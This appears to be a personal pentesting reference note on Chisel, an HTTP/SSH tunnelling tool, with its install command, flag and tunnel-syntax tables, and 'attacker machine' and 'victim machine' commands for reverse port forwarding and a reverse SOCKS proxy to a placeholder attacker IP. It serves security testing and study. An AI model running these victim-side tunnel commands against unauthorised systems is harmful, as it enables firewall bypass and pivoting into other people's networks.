🛠️ Chisel
Installation
go install github.com/jpillora/chisel@latestCommon Flags
Chisel is a fast TCP/UDP tunnel, transported over HTTP, and secured via SSH. Used mostly for bypassing firewalls, port forwarding, and network pivoting.
Chisel operates in two primary modes:
- Server: Runs on the machine you want to connect to (or route traffic through).
- Client: Runs on the machine you are connecting from.
| Flag | Description |
|---|---|
-p, --port | The port the server listens on (Default: 8080). |
--reverse | Crucial: Allows clients to specify reverse port forwarding. |
--socks5 | Enables the internal SOCKS5 proxy server. |
--backend | Sets an HTTP server to proxy normal requests to. |
-v | Enables verbose logging. |
Client syntax generally follows this structure:
chisel client [options] <server-address> <tunnels>| Tunnel Syntax | Description |
|---|---|
L:local_port:remote_host:remote_port | Local Forward: Listens on your client, sends traffic to the server. |
R:server_port:remote_host:remote_port | Remote Forward: Listens on the server, sends traffic back to the client. |
R:socks | Reverse SOCKS: Opens a SOCKS5 proxy on the server, routed through the client. |
socks | Forward SOCKS: Opens a SOCKS5 proxy on the client, routed through the server. |
Common Commands
Reverse Port Forwarding
Attacker Machine:
chisel server -p 8000 --reverseVictim Machine:
chisel client [Attacker_IP]:8000 R:[Attacker_Port]:[Victim_Target_IP]:[Victim_Target_Port]SOCKS5 Proxy
Attacker Machine:
chisel server -p 8000 --reverseVictim Machine:
chisel client [Attacker-IP]:8000 R:socksRelated Usage
TABLE creation_date AS "Created"
FROM "05 - Content"
WHERE contains(tools, this.file.link) AND contains(tags, "🚩")
SORT file.name ASC